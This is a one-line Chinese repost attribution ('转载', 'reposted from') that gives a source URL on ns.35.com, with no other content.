转载:http://ns.35.com/?p=211